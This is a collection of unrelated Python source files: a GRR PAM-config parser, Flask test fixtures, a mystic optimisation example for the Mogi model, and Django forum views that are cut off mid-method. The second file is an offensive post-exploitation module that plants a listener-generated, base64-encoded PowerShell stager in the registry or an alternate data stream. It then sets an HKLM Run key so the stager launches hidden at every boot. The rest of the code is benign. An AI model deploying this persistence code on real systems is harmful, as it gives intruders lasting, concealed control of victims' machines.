| |
#!/usr/bin/env python
"""Parsers for Linux PAM configuration files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import os
import re
from future.builtins import zip
from grr_response_core.lib import parsers
from grr_response_core.lib import utils
from grr_response_core.lib.parsers import config_file
from grr_response_core.lib.rdfvalues import config_file as rdf_config_file
class PAMFieldParser(config_file.FieldParser):
"""Field parser for PAM configurations."""
# The syntax is based on:
# http://linux.die.net/man/5/pam.d
PAMDIR = "/etc/pam.d"
OLD_PAMCONF_FILENAME = "/etc/pam.conf"
PAMCONF_RE = re.compile(
r"""
(\S+) # The "type".
\s+ # separator
( # Now match the "control" argument.
\[[^\]]*\] # Complex form. e.g. [success=ok default=die] etc.
| \w+ # Or a single word form.
) # End of the "control" argument.
\s+ # separator
(\S+) # The "module-path".
(?:\s+(.*))? # And the optional "module-arguments" is anything else.
""", re.VERBOSE)
def _FixPath(self, path):
# Anchor any relative paths in the PAMDIR
if not os.path.isabs(path):
return os.path.join(self.PAMDIR, path)
else:
return path
def EnumerateAllConfigs(self, pathspecs, file_objects):
"""Generate RDFs for the fully expanded configs.
Args:
pathspecs: A list of pathspecs corresponding to the file_objects.
file_objects: A list of file handles.
Returns:
A tuple of a list of RDFValue PamConfigEntries found & a list of strings
which are the external config references found.
"""
# Convert the stats & file_objects into a cache of a
# simple path keyed dict of file contents.
cache = {}
for pathspec, file_obj in zip(pathspecs, file_objects):
cache[pathspec.path] = utils.ReadFileBytesAsUnicode(file_obj)
result = []
external = []
# Check to see if we have the old pam config file laying around.
if self.OLD_PAMCONF_FILENAME in cache:
# The PAM documentation says if it contains config data, then
# it takes precedence over the rest of the config.
# If it doesn't, the rest of the PAMDIR config counts.
result, external = self.EnumerateConfig(None, self.OLD_PAMCONF_FILENAME,
cache)
if result:
return result, external
# If we made it here, there isn't a old-style pam.conf file worth
# speaking of, so process everything!
for path in cache:
# PAM uses the basename as the 'service' id.
service = os.path.basename(path)
r, e = self.EnumerateConfig(service, path, cache)
result.extend(r)
external.extend(e)
return result, external
def EnumerateConfig(self, service, path, cache, filter_type=None):
"""Return PamConfigEntries it finds as it recursively follows PAM configs.
Args:
service: A string containing the service name we are processing.
path: A string containing the file path name we want.
cache: A dictionary keyed on path, with the file contents (list of str).
filter_type: A string containing type name of the results we want.
Returns:
A tuple of a list of RDFValue PamConfigEntries found & a list of strings
which are the external config references found.
"""
result = []
external = []
path = self._FixPath(path)
# Make sure we only look at files under PAMDIR.
# Check we have the file in our artifact/cache. If not, our artifact
# didn't give it to us, and that's a problem.
# Note: This should only ever happen if it was referenced
# from /etc/pam.conf so we can assume that was the file.
if path not in cache:
external.append("%s -> %s", self.OLD_PAMCONF_FILENAME, path)
return result, external
for tokens in self.ParseEntries(cache[path]):
if path == self.OLD_PAMCONF_FILENAME:
# We are processing the old style PAM conf file. It's a special case.
# It's format is "service type control module-path module-arguments"
# i.e. the 'service' is the first arg, the rest is line
# is like everything else except for that addition.
try:
service = tokens[0] # Grab the service from the start line.
tokens = tokens[1:] # Make the rest of the line look like "normal".
except IndexError:
continue # It's a blank line, skip it.
# Process any inclusions in the line.
new_path = None
filter_request = None
try:
# If a line starts with @include, then include the entire referenced
# file.
# e.g. "@include common-auth"
if tokens[0] == "@include":
new_path = tokens[1]
# If a line's second arg is an include/substack, then filter the
# referenced file only including entries that match the 'type'
# requested.
# e.g. "auth include common-auth-screensaver"
elif tokens[1] in ["include", "substack"]:
new_path = tokens[2]
filter_request = tokens[0]
except IndexError:
# It's not a valid include line, so keep processing as normal.
pass
# If we found an include file, enumerate that file now, and
# included it where we are in this config file.
if new_path:
# Preemptively check to see if we have a problem where the config
# is referencing a file outside of the expected/defined artifact.
# Doing it here allows us to produce a better context for the
# problem. Hence the slight duplication of code.
new_path = self._FixPath(new_path)
if new_path not in cache:
external.append("%s -> %s" % (path, new_path))
continue # Skip to the next line of the file.
r, e = self.EnumerateConfig(service, new_path, cache, filter_request)
result.extend(r)
external.extend(e)
else:
# If we have been asked to filter on types, skip over any types
# we are not interested in.
if filter_type and tokens[0] != filter_type:
continue # We can skip this line.
# If we got here, then we want to include this line in this service's
# config.
# Reform the line and break into the correct fields as best we can.
# Note: ParseEntries doesn't cope with what we need to do.
match = self.PAMCONF_RE.match(" ".join(tokens))
if match:
p_type, control, module_path, module_args = match.group(1, 2, 3, 4)
# Trim a leading "-" from the type field if present.
if p_type.startswith("-"):
p_type = p_type[1:]
result.append(
rdf_config_file.PamConfigEntry(
service=service,
type=p_type,
control=control,
module_path=module_path,
module_args=module_args))
return result, external
class PAMParser(parsers.MultiFileParser):
"""Artifact parser for PAM configurations."""
output_types = [rdf_config_file.PamConfig]
supported_artifacts = ["LinuxPamConfigs"]
def __init__(self, *args, **kwargs):
super(PAMParser, self).__init__(*args, **kwargs)
self._field_parser = PAMFieldParser()
def ParseFiles(self, knowledge_base, pathspecs, filedescs):
del knowledge_base # Unused.
results, externals = self._field_parser.EnumerateAllConfigs(
pathspecs, filedescs)
yield rdf_config_file.PamConfig(entries=results, external_config=externals)
| |
import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Registry',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) via the HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run '
'registry key. This has an easy detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'KeyName' : {
'Description' : 'Key name for the run trigger.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# trigger options
keyName = self.options['KeyName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "Remove-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+";"
script += "'Registry persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
# store the script in the specified alternate data stream location
if adsPath != '':
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''more < "+adsPath+"\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath + "."
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "$((gp "+path+" "+name+")."+name+")"
script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"start -Win Hidden -A \"-enc "+locationString+"\" powershell\"';"
script += "'Registry persistence established "+statusMsg+"'"
return script
| |
import contextlib
import datetime
import mock
import os
import subprocess
from flask_migrate import upgrade
import pytest
from responses import RequestsMock
import sqlalchemy
from app.main.models import User
from app.config import SQLALCHEMY_DATABASE_URI
from app.extensions import db as _db, user_datastore
from app.factory import create_app
from tests.oidc_testbed import MockOIDCProvider
TEST_DATABASE_URI = SQLALCHEMY_DATABASE_URI + '_test'
config = {
'issuer': 'http://example.com',
}
@pytest.yield_fixture(scope='session')
def responses():
with RequestsMock(assert_all_requests_are_fired=False) as patch:
yield patch
@pytest.yield_fixture(scope='session')
def provider(responses):
op = MockOIDCProvider(responses, config)
op.init_endpoints()
yield op
op.remove_endpoints()
@pytest.yield_fixture(scope='session')
def app(provider):
app = create_app(**{
'TESTING': True,
'SQLALCHEMY_DATABASE_URI': TEST_DATABASE_URI,
'PREFERRED_URL_SCHEME': 'http',
'WTF_CSRF_ENABLED': False,
'OIDC_CLIENT': {
'issuer': config['issuer'],
'client_id': 'test-client',
'client_secret': 'test-secret'
},
'OIDC_PROVIDER': {
'issuer': 'https://localhost:5000',
'subject_id_hash_salt': 'salt'
}
})
ctx = app.app_context()
ctx.push()
yield app
ctx.pop()
def reset_migrations(db):
# reset migrations, otherwise they will not be reapplied
conn = db.engine.connect()
try:
conn.execute('DELETE FROM alembic_version')
except sqlalchemy.exc.ProgrammingError:
pass
finally:
conn.close()
def teardown_db(db_url, db):
if db_url.drivername == 'postgresql':
db.drop_all()
reset_migrations(db)
if db_url.drivername == 'sqlite':
if os.path.exists(db_url.database):
os.unlink(db_url.database)
def init_db(db_url, db):
sqlalchemy.orm.configure_mappers()
try:
teardown_db(db_url, db)
except sqlalchemy.exc.OperationalError as e:
if 'does not exist' in str(e):
create_db(db_url)
init_db(db_url, db)
upgrade()
def create_db(db_url):
dbname = db_url.database
if db_url.drivername == 'postgresql':
subprocess.call(['/usr/bin/env', 'createdb', dbname], timeout=1)
if db_url.drivername == 'sqlite':
# created automatically by migrations
pass
@pytest.yield_fixture(scope='session')
def db(request, app):
_db.app = app
db_url = sqlalchemy.engine.url.make_url(TEST_DATABASE_URI)
init_db(db_url, _db)
yield _db
teardown_db(db_url, _db)
@pytest.yield_fixture(scope='function')
def db_session(db, request):
connection = db.engine.connect()
transaction = connection.begin()
session_factory = sqlalchemy.orm.sessionmaker(bind=connection)
db.session = session = sqlalchemy.orm.scoped_session(session_factory)
yield session
transaction.rollback()
connection.close()
session.remove()
@pytest.fixture
def selenium(db, live_server, selenium):
"""Override selenium fixture to always use flask live server"""
return selenium
@pytest.fixture
def test_user(db_session):
user = User(email='test@example.com', name='Test Test', active=True)
db_session.add(user)
db_session.commit()
return user
@pytest.fixture
def test_admin_user(db_session):
admin = user_datastore.find_or_create_role('admin')
user = user_datastore.create_user(
email="admin@example.com",
roles=[admin],
is_superadmin=True,
can_accept_suits=True)
user_datastore.commit()
return user
@pytest.fixture
def unnamed_user(db_session):
user = User(email='test@example.com', active=True)
db_session.add(user)
db_session.commit()
return user
@pytest.yield_fixture
def login(client):
def do_login(user):
with client.session_transaction() as session:
session['user_id'] = user.id
session['_fresh'] = True
yield do_login
with client.session_transaction() as session:
del session['user_id']
del session['_fresh']
@pytest.yield_fixture
def unnamed_user_logged_in(unnamed_user, login):
login(unnamed_user)
yield unnamed_user
@pytest.yield_fixture
def logged_in(test_user, login):
login(test_user)
yield test_user
@pytest.yield_fixture
def admin_logged_in(test_admin_user, login):
login(test_admin_user)
yield test_admin_user
@pytest.fixture
def utcnow():
@contextlib.contextmanager
def patch_now(module, val):
with mock.patch(module) as dt:
dt.utcnow.return_value = val
dt.side_effect = datetime.datetime
yield
return patch_now
| |
#!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2015 California Institute of Technology.
# License: 3-clause BSD. The full license text is available at:
# - http://trac.mystic.cacr.caltech.edu/project/mystic/browser/mystic/LICENSE
"""
Example use of Forward Mogi Model
in mystic and PARK optimization frameworks.
(built for mystic "trunk" and with park-1.2)
for help, type "python rosetta_mogi_example.py --help"
"""
from math import pi
from numpy import array
try: # check if park is installed
import park
#import park.parksnob
import park.parkde
Model = park.Model
__park = True
except ImportError:
Model = object
__park = False
def ForwardMogiFactory(params):
x0,y0,z0,dV = params
def forward_mogi(evalpts):
""" evalpts should be a 2D (2 by N) numpy array """
dx = evalpts[0,:] - x0
dy = evalpts[1,:] - y0
dz = 0 - z0
c = dV * 3. / 4. * pi
# or equivalently c= (3/4) a^3 dP / rigidity
# where a = sphere radius, dP = delta Pressure
r2 = dx*dx + dy*dy + dz*dz
C = c / pow(r2, 1.5)
return array((C*dx,C*dy,C*dz))
return forward_mogi
# --- Cost Function stuff ---
def filter_for_zdisp(input):
return -input[2,:]
# Here is the cost function
def vec_cost_function(params):
model = ForwardMogiFactory(params)
zdisp = filter_for_zdisp(model(stations))
return 100. * (zdisp - data_z)
# Here is the normed version [NOTE: fit this one!]
def cost_function(params):
x = vec_cost_function(params)
return numpy.sum(real((conjugate(x)*x)))
# a cost function with parameters "normalized"
def vec_cost_function2(params):
sca = numpy.array([1000, 100., 10., 0.1])
return vec_cost_function(sca * params)
# --- Cost Function end ---
# --- Plotting stuff ---
import pylab
def plot_sol(params,linestyle='b-'):
forward_solution = ForwardMogiFactory(params)
xx = arange(-30,30,0.1)+actual_params[0]
yy = 0*xx + actual_params[1]
ss = array((xx, yy))
dd = forward_solution(ss)
pylab.plot(ss[0,:],-dd[2,:],'%s'%linestyle,linewidth=2.0)
def plot_noisy_data():
import pylab
pylab.plot(stations[0,:],-data[2,:]+noise[2,:],'k.')
# --- Plotting end ---
# --- Call to Mystic's Fmin optimizer ---
def mystic_optimize(point):
from mystic.monitors import Monitor, VerboseMonitor
from mystic.tools import getch, random_seed
random_seed(123)
from mystic.solvers import NelderMeadSimplexSolver as fmin
from mystic.termination import CandidateRelativeTolerance as CRT
simplex, esow = VerboseMonitor(50), Monitor()
solver = fmin(len(point))
solver.SetInitialPoints(point)
solver.SetEvaluationMonitor(esow)
solver.SetGenerationMonitor(simplex)
solver.Solve(cost_function, CRT())
solution = solver.Solution()
return solution
# --- Mystic end ---
# --- Call to Mystic's DE optimizer ---
def mystic_optimize2(point):
from mystic.monitors import Monitor, VerboseMonitor
from mystic.tools import getch, random_seed
random_seed(123)
from mystic.solvers import DifferentialEvolutionSolver as de
from mystic.termination import ChangeOverGeneration as COG
NPOP = 50
simplex, esow = VerboseMonitor(50), Monitor()
solver = de(len(point),NPOP)
solver.SetInitialPoints(point)
solver.SetEvaluationMonitor(esow)
solver.SetGenerationMonitor(simplex)
solver.Solve(cost_function, COG(generations=100), \
CrossProbability=0.5, ScalingFactor=0.5)
solution = solver.Solution()
return solution
# --- Mystic end ---
# --- Call to Park ---
class MogiModel(Model):
"""a park model:
- parameters are passed as named strings to set them as class attributes
- function that does the evaluation must be named "eval"
- __call__ generated that takes namestring and parameter-named keywords
"""
parameters = ["x0","y0","z0","dV"]
def eval(self, x):
x0 = self.x0
y0 = self.y0
z0 = self.z0
dV = self.dV
f = ForwardMogiFactory((x0,y0,z0,dV))
return f(x)
pass
class Data2D(object):
"""2d model data with the required park functions"""
def __init__(self,z):
self.z = z
return
def residuals(self,model):
zdisp = filter_for_zdisp(model(stations))
return (100. * (zdisp - self.z)).flatten()
pass
def park_optimize(point):
# build the data instance
data2d = Data2D(data_z)
# build the model instance
x0,y0,z0,dV = point
model = MogiModel("mymodel",x0=x0,y0=y0,z0=z0,dV=dV)
# required to set bounds on the parameters
#model.x0 = [-numpy.inf,numpy.inf]
#model.y0 = [-numpy.inf,numpy.inf]
#model.z0 = [-numpy.inf,numpy.inf]
#model.dV = [-numpy.inf,numpy.inf]
model.x0 = [-5000,5000]
model.y0 = [-5000,5000]
model.z0 = [-5000,5000]
model.dV = [-5000,5000]
# add a monitor, and set to print results to the console
handler=park.fitresult.ConsoleUpdate()
# select the fitter, and do the fit
#fitter=park.parksnob.Snobfit()
fitter=park.parkde.DiffEv()
# 'fit' requires a list of tuples of (model,data)
result=park.fit.fit([(model,data2d)],fitter=fitter,handler=handler)
# print results
#print result.calls # print number of function calls
#result.print_summary() # print solution
# get the results back into a python object
solution = {}
for fitparam in result.parameters:
solution[fitparam.name] = fitparam.value
solution = [ solution['mymodel.x0'],
solution['mymodel.y0'],
solution['mymodel.z0'],
solution['mymodel.dV'] ]
return solution
# --- Park end ---
if __name__ == '__main__':
# parse user selection to solve with "mystic" [default] or "park"
# also can select mystic's optimizer: "diffev" or "fmin" [default]
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-p","--park",action="store_true",dest="park",\
default=False,help="solve with park (instead of mystic)")
parser.add_option("-m","--mystic",action="store_true",dest="mystic",\
default=False,help="solve with mystic's DE optimizer)")
parsed_opts, parsed_args = parser.parse_args()
from numpy import pi, sqrt, array, mgrid, random, real, conjugate, arange
from numpy.random import rand
import numpy
# Let the "actual parameters" be :
actual_params = [1234.,-500., 10., .1]
actual_forward = ForwardMogiFactory(actual_params)
print "Target: %s" % actual_params
# The data to be "fitted"
xstations = array([random.uniform(-30,30) for i in range(300)])+actual_params[0]
ystations = 0*xstations + actual_params[1]
stations = array((xstations, ystations))
data = actual_forward(stations)
# generate noise... gaussian distribution with mean 0, sig 0.1e-3
noise = array([[random.normal(0,0.1e-3) for i in range(data.shape[1])] for j in range(data.shape[0])])
# Here is the "observed data"
data_z = -data[2,:] + noise[2,:]
# plot the noisy data
plot_noisy_data()
point = [1000,-100,0,1] # cg will do badly on this one
# DO OPTIMIZATION STUFF HERE TO GET SOLUTION
if parsed_opts.park: #solve with park's DE
if __park:
print "Solving with park's DE optimizer..."
solution = park_optimize(point)
else:
print('This option requires park to be installed')
exit()
elif parsed_opts.mystic: #solve with mystic's DE
print "Solving with mystic's DE optimizer..."
solution = mystic_optimize2(point)
else: #solve with mystic's fmin
print "Solving with mystic's fmin optimizer..."
solution = mystic_optimize(point)
print "Solved: %s" % solution
# plot the solution
plot_sol(solution,'r-')
pylab.show()
# End of file
| |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from datetime import datetime
from collections import defaultdict
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import Permission
from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.urls import reverse
from django.db import transaction
from django.http import HttpResponse, Http404, HttpResponseBadRequest
from django.shortcuts import get_object_or_404, redirect, _get_queryset, render
from django.utils.translation import ugettext_lazy as _, ugettext
from django.utils.decorators import method_decorator
from django.views.generic.edit import ModelFormMixin
from django.views.decorators.csrf import csrf_protect
from django.views.generic.edit import FormMixin
from django.views.generic.base import TemplateResponseMixin
from django.views.decorators.http import require_http_methods
from pure_pagination.paginator import Paginator, EmptyPage
from pybb import defaults
from pybb.compat import get_user_model
from pybb.models import (Forum, Topic, Post, Moderator, LogModeration, Attachment, Poll,
TopicReadTracker, ForumReadTracker, PollAnswerUser, Subscription)
from pybb.models.mixins import prefetch_parent_forums
from pybb.util import load_class, generic, queryset_to_dict, redirect_to_login
from pybb.models.base import markup
from pybb.forms import (PostForm, AdminPostForm, PostsMoveExistingTopicForm,
PollAnswerFormSet, AttachmentFormSet, PollForm,
ForumForm, ModerationForm, SearchUserForm,
get_topic_move_formset, get_topic_merge_formset,
get_topic_delete_formset, PostsMoveNewTopicForm)
from pybb.templatetags.pybb_tags import pybb_topic_poll_not_voted
from pybb.helpers import load_user_posts
login_required = load_class(defaults.PYBB_LOGIN_REQUIRED_DECORATOR)
def filter_hidden(request, queryset_or_model):
"""
Return queryset for model, manager or queryset,
filtering hidden objects for non authenticated users and staff users.
"""
queryset = _get_queryset(queryset_or_model)
return queryset.filter_by_user(request.user)
class ListView(generic.ListView):
prefetch_fields = None
prefetch_profiles = None
prefetch_parent_forums = None
allow_empty_page = False
forum_cache = {}
def paginate_queryset(self, queryset, page_size):
try:
paginator, page, queryset, is_paginated = super(ListView, self).paginate_queryset(queryset, page_size)
except EmptyPage:
if self.allow_empty_page:
return None, None, None, False
raise Http404(ugettext('Page is empty.'))
else:
if self.prefetch_fields:
queryset = queryset.prefetch_related(*self.prefetch_fields)
if self.prefetch_profiles:
queryset = queryset.prefetch_profiles(*self.prefetch_profiles)
if self.prefetch_parent_forums is not None:
queryset = prefetch_parent_forums(queryset, forum_cache_by_id=self.forum_cache, through=self.prefetch_parent_forums)
return paginator, page, queryset, is_paginated
class IndexView(ListView):
template_name = 'pybb/index.html'
context_object_name = 'forums'
allow_empty_page = True
def get_context_data(self, **kwargs):
ctx = super(IndexView, self).get_context_data(**kwargs)
forums = queryset_to_dict(filter_hidden(self.request, Forum.objects.filter(forum__isnull=True)))
for forum in ctx['forums']:
if forum.forum_id in forums:
parent_forum = forums[forum.forum_id]
if not hasattr(parent_forum, 'forums_accessed'):
parent_forum.forums_accessed = []
parent_forum.forums_accessed.append(forum)
ctx['forums'] = sorted(forums.values(), key=lambda forum: forum.position)
return ctx
def get_queryset(self):
qs = filter_hidden(self.request, (Forum.objects.filter(forum__forum__isnull=True, forum__isnull=False)
.select_related('last_post__topic__forum',
'last_post__user')
.order_by('forum', 'position')))
return qs
class ForumCreateView(generic.CreateView):
form_class = ForumForm
template_name = 'pybb/forum/create.html'
model = Forum
context_object_name = 'forum'
def get_initial(self):
initial = super(ForumCreateView, self).get_initial()
if hasattr(self, 'parent_forum'):
initial['forum'] = self.parent_forum
return initial
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
parent_forum_id = self.kwargs.pop('forum_id', None)
if parent_forum_id:
self.parent_forum = get_object_or_404(Forum.objects.all(), pk=parent_forum_id)
self.parent_forum.prefetch_parent_forums()
return super(ForumCreateView, self).dispatch(request, *args, **kwargs)
class ForumUpdateView(generic.UpdateView):
form_class = ForumForm
model = Forum
template_name = 'pybb/forum/update.html'
pk_url_kwarg = 'pk'
def get_object(self, queryset=None):
obj = super(ForumUpdateView, self).get_object(queryset=queryset)
obj.prefetch_parent_forums()
return obj
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(ForumUpdateView, self).dispatch(request, *args, **kwargs)
class BaseForumDetailView(ListView):
paginator_class = Paginator
paginate_by = defaults.PYBB_FORUM_PAGE_SIZE
model = Topic
def get(self, request, *args, **kwargs):
forum = self.get_forum()
if forum.is_hidden() and not self.request.user.is_authenticated:
return redirect_to_login(request.build_absolute_uri())
if 'page' in kwargs:
page = kwargs.get('page', None)
if page:
page = int(page)
if page == 1:
return redirect(forum.get_absolute_url(), permanent=True)
self.object_list = self.get_queryset()
allow_empty = self.get_allow_empty()
if not allow_empty and len(self.object_list) == 0:
raise Http404(_(u"Empty list and '%(class_name)s.allow_empty' is False.")
% {'class_name': self.__class__.__name__})
context = self.get_context_data(object_list=self.object_list)
return self.render_to_response(context)
class ForumDetailView(BaseForumDetailView):
context_object_name = 'topic_list'
prefetch_fields = ('user', 'last_post', 'last_post__user')
prefetch_profiles = ('user', 'last_post__user')
prefetch_parent_forums = ()
template_name = 'pybb/forum/detail.html'
url = '^(?P<slug>[\w\-\_]+)/(?:(?P<page>\d+)/)?$'
def get_context_data(self, **kwargs):
ctx = super(ForumDetailView, self).get_context_data(**kwargs)
ctx['forum'] = self.forum
qs = filter_hidden(self.request,
self.forum.forums.select_related('last_post__topic__forum',
'last_post__user'))
self.forum.forums_accessed = qs
for topic in ctx[self.context_object_name]:
topic.forum = self.forum
return ctx
def get_queryset(self):
if not self.forum.is_accessible_by(self.request.user, hidden=False):
raise Http404
qs = (self.forum.topics.order_by('-sticky', '-updated')
.filter_by_user(self.request.user, forum=self.forum))
return qs
def get_forum(self):
self.forum = get_object_or_404(Forum.objects.filter_by_user(self.request.user, hidden=False),
slug=self.kwargs['slug'])
self.forum.prefetch_parent_forums()
return self.forum
class LogModerationListView(ListView):
template_name = 'pybb/moderation/logs.html'
paginate_by = defaults.PYBB_FORUM_PAGE_SIZE
context_object_name = 'logmoderation_list'
paginator_class = Paginator
model = LogModeration
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(LogModerationListView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
return self.model.objects.select_related()
class TopicsLatestView(ListView):
paginator_class = Paginator
paginate_by = defaults.PYBB_TOPIC_PAGE_SIZE
model = Topic
context_object_name = 'topic_list'
prefetch_fields = ('user', 'last_post', 'last_post__user')
prefetch_profiles = ('user', 'last_post__user')
template_name = 'pybb/topic/latest.html'
def get_queryset(self):
return (self.model.objects.visible()
.select_related('forum')
.order_by('-updated'))
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(TopicsLatestView, self).dispatch(request, *args, **kwargs)
class UserPostsView(ListView):
paginate_by = defaults.PYBB_TOPIC_PAGE_SIZE
paginator_class = Paginator
context_object_name = 'post_list'
template_name = 'pybb/user/post_list.html'
prefetch_fields = ('topic', 'topic__user', 'attachments')
prefetch_profiles = ('topic__user',)
def get_queryset(self):
self.user = get_object_or_404(get_user_model(),
username=self.kwargs['username'])
qs = (self.user.posts.all()
.visible(join=False)
.order_by('-created'))
return qs
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(UserPostsView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
ctx = super(UserPostsView, self).get_context_data(**kwargs)
ctx['post_user'] = self.user
load_user_posts(ctx[self.context_object_name], self.user)
return ctx
class UserPostsDeleteView(generic.DeleteView):
template_name = 'pybb/user/posts_delete.html'
context_object_name = 'post_user'
slug_url_kwarg = 'username'
slug_field = 'username'
prefetch_fields = ('topic', 'topic__user', 'attachments')
prefetch_profiles = ('topic__user',)
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(UserPostsDeleteView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
return get_user_model().objects.all()
def get_context_data(self, **kwargs):
context = super(UserPostsDeleteView, self).get_context_data(**kwargs)
posts = (self.object.posts
.visible(join=False)
.order_by('-created')[:10]
.prefetch_related(*self.prefetch_fields)
.prefetch_profiles(*self.prefetch_profiles))
load_user_posts(posts, self.object)
context['post_list'] = posts
context['count'] = self.object.posts.visible().count()
return context
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.posts.all().update(deleted=True)
for topic in Topic.objects.filter(first_post__user=self.object):
topic.mark_as_deleted()
messages.success(self.request, _('All messages from %(user)s has been deleted') % {
'user': self.object
})
return redirect(self.get_success_url())
def get_success_url(self):
return reverse('pybb:user_posts', kwargs={
'username': self.object.username
})
class TopicDetailView(ListView):
paginate_by = defaults.PYBB_TOPIC_PAGE_SIZE
paginator_class = Paginator
context_object_name = 'post_list'
template_name = 'pybb/topic/list.html'
prefetch_fields = ('user', 'attachments')
prefetch_profiles = ('user',)
url = '^(?P<forum_slug>[\w\-\_]+)/(?P<pk>\d+)-(?P<slug>[\w\-\_]+)(?:\-(?P<page>\d+)/)?$'
def get(self, request, *args, **kwargs):
topic = self.get_topic()
if topic.is_hidden() and not self.request.user.is_authenticated:
return redirect_to_login(request.build_absolute_uri())
self.object_list = self.get_queryset()
allow_empty = self.get_allow_empty()
if not allow_empty and len(self.object_list) == 0:
raise Http404(_(u"Empty list and '%(class_name)s.allow_empty' is False.")
% {'class_name': self.__class__.__name__})
context = self.get_context_data(object_list=self.object_list)
if (topic.slug != self.kwargs['slug'] or
('forum_slug' in self.kwargs and topic.forum.slug != self.kwargs['forum_slug'])):
return redirect(topic.get_absolute_url(), permanent=True)
if topic.redirect:
redirection = topic.redirection
